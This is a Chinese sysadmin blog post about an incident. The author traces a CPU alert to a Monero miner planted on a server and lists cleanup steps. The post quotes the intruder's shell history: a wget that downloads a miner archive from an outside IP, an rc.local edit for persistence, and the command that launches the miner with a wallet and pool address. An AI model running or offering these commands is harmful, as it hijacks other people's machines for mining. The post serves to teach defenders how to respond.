版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/mfanoffice2012/article/details/78899552
早上到公司发现zabbix有一个报警:一台服务器的CPU使用率达到100%!
1.立即登录该服务器查看CPU top10
ps aux | head -1; | ps aux | grep -v PID | sort -rn -k 4 |head发现 有一个yam开头的进程CPU已经占用120%,(此处无截图)
经确认,并非业务上的应用,凭经验分析,可以断定是被入侵了。
2.find找一下本地有没有yam相关的目录
find / -name yam已经查到了(下图),就在root家目录下,有压缩包,还有解压的目录,痕迹也太明显了吧! 打开看一下里面的内容发现是一个挖矿机。
3.查看下登录日志
last
这三个IP是美国的,不知道是不是代理,然后看一下登录进来都做什么操作了:
history贴出关键部分
884 wget http://210.245.92.160:9090/miner.tgz
885 vi /etc/rc.d/rc.local
886 tar zxvf miner.tgz
887 cd yam-yvg1900-M7v-linux64-generic
888 cd linux64-generic
889 nohup ./yam -c 1 -M stratum+tcp://48zmbpHJyke7y9uewNAS7miDMqQcz8RH7BTqKaYFtVWx2UJ7mzLqVd8KWjeW1Bu5jr2zcUZqTHzYofn3kT76PsndSb5h3M3:[email protected]:8005:8050:8080:8100/xmr很明显,下载了这个包,解压运行了,还加了开机启动,不过竟然没有清除痕迹就走了。
4.看一下他get的这个网站
好吧,自己做的一个页面方便别人下载矿机用的。
在里面的文件发现软件的作者
5.清理工作
kill 掉进程
删除root家目录的包
删除/etc/rc.d/rc.local中的开机启动项
更改root密码
先做这么多,大家还有什么好的建议请多指教。